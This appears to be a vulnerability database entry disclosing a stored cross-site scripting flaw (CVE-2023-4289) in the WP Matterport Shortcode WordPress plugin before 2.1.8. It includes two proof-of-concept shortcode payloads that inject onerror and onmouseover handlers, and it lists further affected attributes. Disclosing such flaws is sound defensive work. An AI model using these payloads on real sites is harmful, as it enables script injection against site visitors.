Lucene search
Dmitrii IgnatyevWPEX-ID:38C337C6-048F-4009-AEF8-29C18AFA6FDCHistorySep 25, 2023 - 12:00 a.m.
WP Matterport Shortcode < 2.1.8 - Contributor+ Stored XSS via shortcode
2023-09-2500:00:00
Dmitrii Ignatyev
53
contributor
stored xss
shortcode
matterport
attributes
exploit
EPSS
0.001
Percentile
20.8%
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the following shortcodes in the page/post and view/preview it
[matterport src="test" width='1 " onerror="alert(/XSS1/)']
[matterport src="test" window='"onmouseover=alert(/XSS2/)//'] (and move the mouse over the generated block to trigger the XSS)
Other affected attributes: height, help, hl, qs, brand, lang, hhl, kb, lp, title, tourcta, maxzoom, minzoom, zoomtrans, mpv, filter, minimapfilter, copyright, ga, aaRelated
cvelist
cvelist
cve
cve
CVE-2023-4289
2023-10-16 20:15:15
prion
prion
Cross site scripting
2023-10-16 20:15:00
wpvulndb
wpvulndb
WP Matterport Shortcode < 2.1.8 - Contributor+ Stored XSS via shortcode
2023-09-25 00:00:00
nvd
nvd
CVE-2023-4289
2023-10-16 20:15:15